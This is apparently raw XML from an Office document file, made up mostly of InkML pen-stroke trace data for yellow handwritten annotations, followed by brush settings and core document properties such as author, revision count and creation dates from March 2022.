  <inkml:trace contextRef="#ctx0" brushRef="#br0">435 213 24575,'38'0'0,"-4"0"0,28 0 0,-17 0 0,17 0 0,34 0 0,4 0 0,-10 0-368,-23 0 1,11 0-1,-15 0 368,-7-4 0,35 3 0,-43-3 0,7 4 0,-39 0 0,-8 0 0,1 0 1103,-5 0-1103,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,12 0 0,3 0 0,18 0 0,0-3 0,14 2 0,3-5 0,10 5 0,0-6 0,-6 6 0,-10-3 0,2 4 0,-11 0 0,3 0 0,-10 0 0,-8 0 0,-8 0 0,-6 0 0,5 0 0,13 0 0,11-7 0,24 6 0,9-10 0,18 5-684,-27-1 0,2-1 684,-14 3 0,2-1 0,24-4 0,1-1 0,-15 2 0,-2 1 0,-6 2 0,-2 0-145,5-3 0,-2 0 145,17 3 0,0-3 0,-9 2 0,-26 6 0,-6-5 0,-15 5 1347,-2-1-1347,-6 2 311,1 0-311,-4 0 0,3 0 0,-2 0 0,2 0 0,-3 0 0,3 0 0,-5 0 0,2 0 0,0 0 0,10 0 0,14 0 0,17 0 0,17 0 0,7 0 0,-1 0 0,-6 0 0,-6 0 0,5 3 0,2 2 0,1 3 0,-8 3 0,-20-3 0,-7 2 0,-11-5 0,-3 1 0,-2-3 0,-5-1 0,5-2 0,-6 0 0,6 0 0,-5 0 0,2 0 0,-2 0 0,-1 0 0,0 0 0,-2 0 0,1 0 0,-1 0 0,2 0 0,0 0 0,3 0 0,1 0 0,3 0 0,0 0 0,0 0 0,-1 0 0,-2 0 0,-1 0 0,-2 0 0,-4 0 0,0 0 0,0 0 0,1 0 0,1 0 0,8 0 0,5 0 0,7 0 0,29 0 0,35 0 0,21 0 0,5 0 0,-10 0 0,-24 0 0,0 0 0,0 0-563,-1 1 1,24 0 0,10 0 0,-6-1-1,-19 0 1,-34-3 562,-27-3 0,1-1 0,1-4 0,0-1 0,-6 5 0,-7-4 0,-1 7 3374,-6-4-3374,-4 8 0,0-5 0,-2 2 0,42-1 0,15 1 0,9-1 0,5 1 0,1 1 0,7 2 0,-24 3 0,-1 4 0,-18 5 0,34 14 0,-32-9 0,30 10 0,-48-17 0,11 2 0,13-1 0,-30-7 0,19 5 0,-34-8 0,3 1 0,0-2 0,19 2 0,-15-1 0,13 1 0,-17 0 0,0-1 0,0 1 0,-2 0 0,2-1 0,-3 1 0,4-2 0,-1 0 0,0 0 0,0 2 0,0-1 0,1 1 0,-1-2 0,0 2 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 3 0,0-3 0,3 4 0,-2-3 0,5 4 0,-5-1 0,5 1 0,-2-4 0,2 3 0,-2-2 0,-1 3 0,2 1 0,-3-4 0,18 2 0,-1-5 0,9 0 0,4 6 0,-4 5 0,4 4 0,-3 5 0,-2-6 0,5 3 0,-3 0 0,4-2 0,-6-1 0,-8-5 0,-1-3 0,-4-2 0,1-2 0,-1-2 0,-3 0 0,-1 0 0,0 0 0,-2 0 0,6 0 0,-7 0 0,7 0 0,0 0 0,6 0 0,18 0 0,-7 0 0,8 0 0,-12 0 0,-4 0 0,0 0 0,-4 0 0,-1 0 0,-7 0 0,3 0 0,-6 0 0,2 0 0,-4 0 0,1 0 0,0 3 0,0-3 0,-3 3 0,2-3 0,5 0 0,-3 2 0,10-1 0,-11 1 0,7 1 0,-3-2 0,7 4 0,-3-4 0,3 5 0,-4-3 0,1 0 0,-1 3 0,0-3 0,1 3 0,-1 0 0,-3 0 0,-1 0 0,0 0 0,-5-1 0,2 1 0,-10-3 0,0 1 0,0-2 0,-2 1 0,2 1 0,-3-2 0,3 3 0,7 0 0,1 1 0,12 3 0,-5 0 0,10 4 0,-3 0 0,4 0 0,-4 0 0,-1-3 0,-3 1 0,-4-4 0,-1 2 0,-6-2 0,2-1 0,-5 4 0,2-4 0,-3 3 0,0-1 0,0 0 0,-2 2 0,-1-5 0,-2 2 0,0-2 0,0 0 0,-3-1 0,0 1 0,-2 0 0,0-1 0,0 3 0,0 1 0,0 5 0,0 1 0,0 3 0,0-1 0,0 4 0,-3 1 0,-5 11 0,1-9 0,-7 5 0,8-12 0,-2 4 0,0-5 0,2 4 0,-2-8 0,3 2 0,0-3 0,2-2 0,-1-1 0,3-2 0,-1-1 0,0 1 0,1-1 0,-3 1 0,2-1 0,-6 3 0,3 4 0,-8 0 0,1 6 0,-10 2 0,3 0 0,-7 4 0,1-4 0,-6 1 0,-12 5 0,3-3 0,-14 1 0,11-2 0,-10-2 0,5 0 0,-9 0 0,2-4 0,-2-3 0,17-2 0,-10-3 0,14 0 0,-7 0 0,1 0 0,8-3 0,-3-1 0,4-3 0,4 0 0,-3 0 0,6 0 0,1 0 0,5 0 0,3 0 0,6 0 0,-2 0 0,8 0 0,-2 0 0,2 0 0,-5 0 0,-1-3 0,-13 0 0,-2-3 0,-11-4 0,-6 2 0,-6-6 0,5 6 0,-7-7 0,-4 3 0,8 1 0,-25-6 0,25 6 0,-22-2 0,15-1 0,-9 5 0,18 1 0,-12 1 0,18 3 0,-8 0 0,4 1 0,5 0 0,0 2 0,9-2 0,1 3 0,3 0 0,1 0 0,-15 0 0,14 0 0,-13 0 0,17 0 0,0 0 0,1 0 0,6 0 0,0 0 0,1-2 0,-1 1 0,-19-1 0,-4 8 0,-21 7 0,-20 9 0,29-6 0,-4 1-522,-11-1 1,-2 0 521,11-2 0,-2-2-1104,-38 3 1,-2-2 1103,27-7 0,0 0 0,1 0 0,-5 1 0,5-2 0,-1-1 0,3-1-567,-8 0 1,1-1 566,15-2 0,1 0 0,-8 0 0,2 0-315,-29 0 315,0 0 0,31 0 846,-5 0-846,-2 0 0,15 0 2131,-9 3-2131,18-2 1320,-6 6-1320,13-7 401,-5 7-401,5-7 0,-3 4 0,7-4 0,1 0 0,4 0 0,5 0 0,3 0 0,1 0 0,3 0 0,0 0 0,1 0 0,-5 0 0,-7 0 0,1 0 0,-23 0 0,22-4 0,-32-4 0,14 2 0,-24-1 0,-2 7 0,-6 0 0,7 0 0,-11 0 0,2 0 0,-3 0-663,25 0 0,-2 0 663,5 0 0,-2 0 0,-15 0 0,-1 0 0,10 2 0,3 0-444,-32-1 444,35 3 0,2 1 0,-14 0 0,18-2 0,-1 0 0,-20 0 0,-2-3 0,8 0 0,-3 0 0,4 0 0,14 0 0,-5 0 1295,12-3-1295,-26-6 475,17-3-475,-15-1 0,28 3 0,-6 3 0,7 0 0,-3 0 0,-1 3 0,1 1 0,-15 3 0,11 0 0,-7 0 0,2 3 0,0-2 0,-45-2 0,44-1 0,-2-2-791,-16-5 0,-4-2 791,-4 0 0,0-2 0,3-3 0,1-1 0,-1 2 0,3 2 0,14 2 0,1 2-70,4 1 1,2 2 69,-28-3 0,23 2 0,3-1 0,-10-1 0,10 2 0,-1 0 0,-9-1 0,-10-4 0,9 3 0,20-1 0,2 3 1570,9 0-1570,0 0 151,4 1-151,1 0 0,7 2 0,-3-1 0,7 4 0,-3-2 0,6 3 0,3 0 0,1 0 0,5 0 0,-5 0 0,-2 0 0,1 0 0,-4 0 0,7 0 0,1 0 0,2 0 0,1 0 0,-1 0 0,2-1 0,2-2 0,1-1 0,0-1 0,0 0 0,0 1 0,2-1 0,0-2 0,3-1 0,1-5 0,-1-1 0,0 0 0,1-2 0,-1 2 0,0 0 0,1 1 0,-1 5 0,-1 1 0,1 3 0,0 1 0,-3-1 0,2 3 0,-1-3 0,1-1 0,2-9 0,-1 0 0,1-7 0,2 1 0,1 3 0,0-3 0,-1 3 0,-3 5 0,1 0 0,-2 7 0,1-3 0,-2 4 0,1-1 0,-4 1 0,5-3 0,-5-1 0,5-2 0,-5 2 0,2-2 0,0 5 0,1-5 0,2 0 0,1-1 0,-3-3 0,1 4 0,-3 2 0,3 1 0,-3 2 0,3 1 0,-4-1 0,4 0 0,-1 1 0,2-3 0,-1-1 0,4-2 0,0-4 0,7-7 0,-3 3 0,6-7 0,-6 5 0,2 4 0,-3 0 0,-3 5 0,-1 4 0,-2-1 0,-2 4 0,1 1 0,-2-1 0,3 4 0,-1-4 0,1 1 0,-1 1 0,-1-3 0,1 5 0,-1-4 0,1 3 0,1-3 0,-1 2 0,1-1 0,-1 1 0,1 0 0,0 1 0,-1-1 0,-1 0 0,1 2 0,-4-4 0,2 1 0,-2-1 0,2-1 0,-2-2 0,5 2 0,-5-2 0,2 2 0,-2 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,2 0 0,-1 1 0,1-1 0,-2 0 0,2 1 0,0-1 0,0 1 0,2 2 0,-3-2 0,3 1 0,-4-1 0,4 1 0,-3-1 0,0 2 0,1-1 0,-1 1 0,1 2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23T18:39:20.004"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">247 972 24575,'19'0'0,"3"0"0,7 0 0,-5-3 0,-5 2 0,-5-2 0,0 3 0,5 0 0,22-3 0,-20 2 0,21-2 0,-31 3 0,19 0 0,-12 0 0,9 0 0,-13 0 0,-3 0 0,2 0 0,-5 0 0,5 0 0,-6 0 0,7 0 0,3 0 0,3 0 0,6 3 0,2-2 0,2 6 0,4-6 0,5 7 0,-3-7 0,9 7 0,-9-7 0,9 8 0,-10-8 0,5 7 0,-6-7 0,0 6 0,1-6 0,20 11 0,-16-6 0,11 6 0,-17-4 0,-3 1 0,-1-1 0,4-4 0,-3 4 0,-1-7 0,4 2 0,-8-3 0,8 0 0,-8 0 0,8 0 0,-8 0 0,8 0 0,-8 0 0,3 0 0,-9-3 0,4-1 0,-4-4 0,1 1 0,13-1 0,-11 4 0,12-3 0,-11 2 0,1 1 0,4-4 0,-3 4 0,8-1 0,-8-2 0,3 3 0,-5-1 0,1-2 0,-1 6 0,-4-5 0,4 5 0,-4-2 0,1 0 0,2 2 0,-2-6 0,3 6 0,-3-6 0,2 3 0,-2 0 0,-1-3 0,14 3 0,-11 0 0,12 0 0,-10 4 0,-5 0 0,4 0 0,1 0 0,1 0 0,8 0 0,-4 0 0,11-4 0,1-1 0,0-4 0,-1 0 0,-11 4 0,-1-2 0,-4 2 0,-5 1 0,3-3 0,-7 6 0,6-2 0,-2 3 0,5 0 0,-1 0 0,6 0 0,0 0 0,1 0 0,3 0 0,-8 0 0,-1 0 0,-6 3 0,-7 1 0,-1 0 0,0-1 0,-3-3 0,15 0 0,-5 0 0,11 0 0,1 0 0,-4 0 0,-1 0 0,3 0 0,-2 0 0,10 0 0,-6 0 0,0 0 0,-6 0 0,6 0 0,-5 0 0,9 0 0,-8 0 0,8 0 0,-3 0 0,4 0 0,0 0 0,1 0 0,-1 0 0,-5 0 0,4 0 0,-3 0 0,-1 0 0,10 0 0,-13 0 0,8 0 0,-10 0 0,-5 0 0,4 0 0,-4 0 0,5 0 0,4 0 0,-3-4 0,13-1 0,-8-3 0,30-13 0,-21 9 0,16-12 0,-21 14 0,-4-2 0,-2 4 0,-4-3 0,-1 2 0,-3-6 0,2 7 0,4-13 0,-1 7 0,1-8 0,-7 11 0,-1-4 0,-3 4 0,4-1 0,-1-2 0,-3 2 0,4-3 0,-5 1 0,0 3 0,-2-3 0,-2 7 0,-4-4 0,1 5 0,-1 2 0,-2-2 0,2 6 0,-6-6 0,3 2 0,-3-2 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-3 1 0,3-1 0,-6 1 0,5-1 0,-5 1 0,3-1 0,-1 1 0,-1 2 0,4-2 0,-5 3 0,5-4 0,-5 4 0,6-3 0,-6 2 0,5-3 0,-2 1 0,0 2 0,0-2 0,-1 3 0,-2-4 0,5 1 0,-4-1 0,1 3 0,0-1 0,-2 1 0,3 0 0,-1-2 0,-2 6 0,3-3 0,-4 0 0,1 2 0,-1-2 0,-7 0 0,-2-2 0,-8-3 0,-15-5 0,1-1 0,-5-1 0,0-2 0,12 8 0,-16-8 0,20 8 0,-2 2 0,18 0 0,1 7 0,6-1 0,-9 2 0,0 2 0,-10-7 0,-1 3 0,0-6 0,-4 2 0,3-6 0,1 2 0,1-6 0,8 7 0,-4-3 0,8 4 0,1 0 0,4 1 0,-1 2 0,1-2 0,-1 5 0,1-2 0,0 3 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-3 0 0,3 0 0,-7 0 0,-1 0 0,0 0 0,-13 0 0,12-3 0,-16 2 0,11-2 0,-8 3 0,6-3 0,-1 2 0,0-3 0,1 4 0,-5 0 0,-2 0 0,-4 0 0,0 0 0,-1 0 0,-4 0 0,3 0 0,-9 4 0,4-3 0,0 7 0,6-7 0,6 3 0,10-4 0,0 3 0,0-2 0,4 2 0,-4-3 0,9 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,-3 0 0,7 0 0,-3 0 0,3 0 0,1 0 0,-1 0 0,-2 0 0,1 0 0,-4 3 0,1 1 0,-8 0 0,0 0 0,-10-1 0,5-2 0,-10 3 0,9 0 0,-8-4 0,4 4 0,-1-4 0,2 0 0,8 0 0,-12 0 0,10 0 0,-17 0 0,14 0 0,-19 0 0,16 0 0,-11 0 0,15 0 0,1 0 0,3 0 0,-3 0 0,4 0 0,-5 0 0,-16 0 0,21 0 0,-19 0 0,17 0 0,-4 0 0,-3 0 0,8 0 0,-2 0 0,-2 0 0,-17 0 0,-8 0 0,1 0 0,-10 0 0,16 0 0,-16 0 0,10 0 0,-5 0 0,12 0 0,2 0 0,5 0 0,4 0 0,2 0 0,8 0 0,5-3 0,5 2 0,3-2 0,1 3 0,-1 0 0,1 0 0,-1 0 0,-3 0 0,-5 0 0,-4-3 0,-10 2 0,0-3 0,-6 4 0,1 0 0,-6-4 0,5 3 0,-5-3 0,10 4 0,2 0 0,4 0 0,5 0 0,0 0 0,5-3 0,-1 2 0,1-2 0,-5 3 0,4-3 0,-18 2 0,15-2 0,-25 3 0,16 0 0,-18 0 0,10 0 0,-11 0 0,15 0 0,-7 0 0,13 0 0,1 0 0,5 0 0,8 0 0,1 0 0,0 0 0,-11 0 0,4 0 0,-19 0 0,19 0 0,-12 0 0,14 0 0,-4 0 0,5 0 0,3 0 0,1 0 0,3 0 0,-3 0 0,-5-4 0,0 0 0,-8-4 0,8 1 0,-4 2 0,5-1 0,3 5 0,-12-6 0,6 6 0,-11-3 0,-21 4 0,14 0 0,-20 0 0,25 0 0,2 0 0,8 0 0,2 0 0,-6 0 0,8 0 0,-7 0 0,4 0 0,4 0 0,0 0 0,1 0 0,7 0 0,-3 0 0,3 0 0,4 3 0,0 0 0,3 4 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-3 4 0,-1 1 0,0 7 0,-3-2 0,2 11 0,1-14 0,-3 13 0,3-14 0,-1 3 0,2-5 0,3 0 0,0-2 0,0 2 0,0-4 0,0 0 0,0 0 0,0 0 0,0 4 0,0 5 0,0 1 0,0 2 0,0-4 0,0-3 0,0 3 0,0-4 0,0 1 0,0-1 0,0-3 0,0-1 0,0 1 0,0-1 0,0 4 0,0-3 0,0 11 0,0-2 0,0 3 0,0 14 0,0-11 0,0 12 0,0-11 0,3-7 0,-2 6 0,2-10 0,-3 3 0,3-5 0,-3-4 0,3 0 0,-3 3 0,0 6 0,0 8 0,0 6 0,0 11 0,0-5 0,4 0 0,0-2 0,1-12 0,2 2 0,-6-9 0,5-3 0,-6-1 0,6-6 0,-3-1 0,3-3 0,0 0 0,1 0 0,-1 2 0,8 3 0,2 2 0,8 4 0,-1-2 0,1 6 0,-1-3 0,-3 0 0,-5-1 0,-2-4 0,-5-1 0,2-2 0,-4 2 0,0-5 0,1 2 0,-1-3 0,-1 0 0,1 0 0,0-3 0,0-1 0,-2-2 0,1 3 0,-4-3 0,5 2 0,-3-2 0,1-1 0,1 4 0,-1-3 0,2 2 0,4-3 0,-3 1 0,7-2 0,-7 5 0,3-3 0,-3 5 0,-1-2 0,1 0 0,-1 2 0,0-2 0,0 3 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-3 0,1 3 0,3-3 0,1 3 0,3-4 0,-3 4 0,2-4 0,-2 4 0,0-2 0,-1 1 0,0-2 0,-3 3 0,3-3 0,-3 2 0,-1-2 0,1 3 0,-1-2 0,0 1 0,0-2 0,1 3 0,-1 0 0,0 0 0,4-3 0,1 2 0,4-2 0,-1 0 0,-3 2 0,2-2 0,-5 3 0,2 0 0,-4 0 0,1 0 0,-1 0 0,-2 0 0,-2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23T18:47:15.563"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">132 958 24575,'24'0'0,"17"0"0,27 0 0,24 0-1514,-34 0 1,1 0 1513,-1 0 0,6 0 0,19 0 0,12 0 0,1 0 0,2 2 0,2 0 0,1 1-1007,-17 0 1,2 1 0,0 0 0,-3 1 1006,21 0 0,-3 0 0,-12 1 0,-15 4 0,-6 0 551,4-3 1,-5-1-552,13 5 0,14 0 0,-28-1 0,-14 0 1209,-16-2-1209,-7-3 4202,-10-1-4202,-2-4 538,-5 0-538,0 3 0,-5-3 0,-1 3 0,1 0 0,-1-2 0,0 1 0,16-2 0,19-5 0,26-1 0,25-11-328,-42 13 1,1 1 327,-1-6 0,0 2 0,42 5 0,-17-3 0,13 5 0,-9 0 0,6 0 0,-12 0 0,-24 0 0,-8 0 0,-13 0 0,-8 0 0,-5 0 655,-5 0-655,-4 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,3 0 0,0 0 0,9 0 0,0 0 0,9 0 0,2 0 0,4 4 0,5 1 0,-3 4 0,9 0 0,-4 0 0,5 0 0,1 5 0,-6-1 0,16 12 0,-18-6 0,19 5 0,-17-6 0,5-4 0,-5 3 0,-6-7 0,-7 2 0,-12-8 0,9-1 0,14-7 0,23-3 0,22-9-335,-35 7 1,0 0 334,37-9 0,4 2 0,-22 10 0,13-4 0,-4 9 0,14-5 0,-14 6 0,-3 0 0,-14 0 0,-7 0 0,0 0 0,-7 0 0,0 0 669,1 0-669,-6 0 0,4 0 0,-10 0 0,0 0 0,9 0 0,-17 0 0,8 0 0,-13 0 0,-2 0 0,3 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,4 0 0,7 0 0,6 0 0,11 0 0,9 0 0,7 0 0,14 0 0,-19 0 0,16 5 0,-23-4 0,17 4 0,-12-1 0,0-2 0,12 2 0,-27 0 0,40-3 0,-40 3 0,16-1 0,-17-2 0,-10 7 0,5-7 0,-10 3 0,3-4 0,-9 3 0,5-2 0,-1 2 0,-3-3 0,8 0 0,-4 0 0,6 4 0,-1 1 0,15 4 0,-15-1 0,14 0 0,-13 1 0,0-1 0,10 2 0,-9-2 0,4 1 0,-1 0 0,-8-4 0,3 2 0,-6-6 0,-7 3 0,6-4 0,-12 0 0,4 0 0,-5 0 0,0 0 0,5 0 0,-4 0 0,18 0 0,-11 0 0,12 0 0,-15 0 0,4 0 0,1 0 0,0 0 0,9-8 0,-3 2 0,4-6 0,0 3 0,0-3 0,1 2 0,-1-2 0,0 3 0,0 0 0,-4 1 0,-2 0 0,-6 1 0,-3 2 0,-5-1 0,-4 6 0,-4-3 0,-2 0 0,1-3 0,-4-1 0,2-6 0,0-2 0,-2-9 0,3-1 0,0-13 0,-3 7 0,7-9 0,-7 10 0,6-3 0,-6 12 0,3-2 0,-4 9 0,0 3 0,0 1 0,0 3 0,0-3 0,-3-1 0,-9-4 0,-9-1 0,-8 0 0,-6-1 0,1-1 0,-6 1 0,-1-1 0,-18 2 0,4 3 0,0 7 0,-24-4 0,25 8 0,-34-3 0,30 0 0,1 0 0,-37-3-384,28 3 0,1-1 384,-26-4 0,20 9 0,20-2 0,0 1 0,-25 2 0,26 0 0,0 0-64,-31 0 64,7 0 0,0 0 0,-1 0 0,-7-5 0,-2-2 0,-7-9-379,42 5 0,-1-2 379,-43-16 0,39 9 0,1-2 0,-20-11 0,25 13 0,2 1 0,-11-11 0,-11 3 735,5-3-735,32 17 64,-12-5-64,35 17 791,-4-11-791,7 10 0,-22-6 0,-3 8 0,-17 0 0,1 4 0,11 5 0,-5 0 0,6 4 0,-6-4 0,-14 0 0,-8 1 0,-20 1 0,5-5 0,8-1 0,-3 0 0,10-4 0,-6 4 0,1-5 0,7 0 0,-14 0 0,11 0 0,-17 0 0,29 0 0,-12 0 0,-8 0 0,17 0 0,-24-5 0,29 0 0,-11-5 0,6-4 0,2 3 0,6-2 0,5 4 0,1 0 0,6 4 0,-1-3 0,1 7 0,0-6 0,-6 6 0,4-7 0,9 7 0,-4-3 0,9 4 0,-7 0 0,-4 0 0,3 0 0,-4 0 0,-1 0 0,1 0 0,-12 0 0,4-4 0,-17 3 0,11-3 0,-4 4 0,0-5 0,4 4 0,2-3 0,0 0 0,11 3 0,-5-3 0,0 4 0,5-4 0,-10 3 0,3-3 0,-4 0 0,-13 3 0,4-8 0,-19-1 0,13-2 0,6-2 0,-9-1 0,20 5 0,-21-5 0,18 5 0,0 1 0,-8 4 0,21 1 0,-19 0 0,17-9 0,2 5 0,-22-4 0,-9 12 0,-28 0-682,36 1 0,-2-2 682,-1-4 0,1-1 0,-5 2 0,1-1 0,6-4 0,2 0-247,5 5 1,0 1 246,-2-3 0,-1 1 0,0 4 0,1 1 0,-45-6 0,44 6 0,2 0 0,-19 0 0,-12 0 0,8 0 0,5 0 0,9 0 0,1 0 0,12 4 0,-6-3 1329,12 3-1329,1-4 528,6 4-528,0-3 0,-1 3 0,6-4 0,-4 0 0,3 4 0,0-3 0,2 2 0,4-3 0,1 0 0,3 0 0,2 0 0,-3 0 0,8 3 0,-7-2 0,9 2 0,0-3 0,1 0 0,4 3 0,-1-3 0,4 6 0,0-3 0,3 4 0,0-1 0,-3 0 0,2 0 0,-4 1 0,1-1 0,1 4 0,-7 1 0,5 7 0,-6 6 0,-1 1 0,-1 8 0,-3-3 0,-2 4 0,5-4 0,-2-2 0,6-4 0,-5-5 0,5-1 0,2-7 0,4-1 0,0-3 0,2-1 0,-2 0 0,3 1 0,0-1 0,0 0 0,0 4 0,0 1 0,0 7 0,0 2 0,0 14 0,4 2 0,1 5 0,14 17 0,-4-24 0,9 22 0,-7-20 0,1 1 0,-5-4 0,-2-13 0,-3-2 0,-2-7 0,1-1 0,-1-7 0,-2 3 0,-1-5 0,-3 2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18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Schranz, Evan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Schranz, Evan</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-22T00:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-24T00:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>